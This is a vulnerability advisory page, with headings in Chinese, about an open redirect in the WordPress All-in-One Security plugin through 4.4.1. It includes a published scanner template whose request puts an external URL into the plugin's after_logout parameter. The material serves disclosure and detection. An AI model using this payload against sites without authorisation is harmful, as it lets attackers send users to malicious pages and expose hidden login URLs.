wp-security-open-redirect: WordPress All-in-One Security <=4.4.1 - Open Redirect

日期: 2025-08-01 | 影响软件: WordPress All-in-One Security | POC: 已公开

漏洞描述

WordPress All-in-One Security plugin through 4.4.1 contains an open redirect vulnerability which can expose the actual URL of the hidden login page feature. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: wp-security-open-redirect

info:
  name: WordPress All-in-One Security <=4.4.1 - Open Redirect
  author: akincibor
  severity: medium
  description: |
    WordPress All-in-One Security plugin through 4.4.1 contains an open redirect vulnerability which can expose the actual URL of the hidden login page feature. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: Upgrade to 4.4.2 or later.
  reference:
    - https://wpscan.com/vulnerability/9898
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-all-in-one-wp-security-firewall-open-redirect-4-4-1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 1
  tags: wp-plugin,redirect,wordpress,wp,wpscan,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4b0a00483046022100a9f7b22f1b454573d09ab301f7ac8a99b3f8d26b9ad50ce28c539566de8005c7022100b8d8cbcfd2fa55a7db261aa7138b2b508e8e98d59069125a3eea8013d951aab1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐